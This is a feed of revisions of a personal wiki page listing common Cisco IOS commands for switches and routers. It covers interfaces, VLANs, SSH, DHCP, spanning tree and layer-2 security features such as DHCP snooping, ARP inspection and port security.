&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1076</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1076"/>
		<updated>2026-02-05T18:48:42Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Trunk Allowed VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
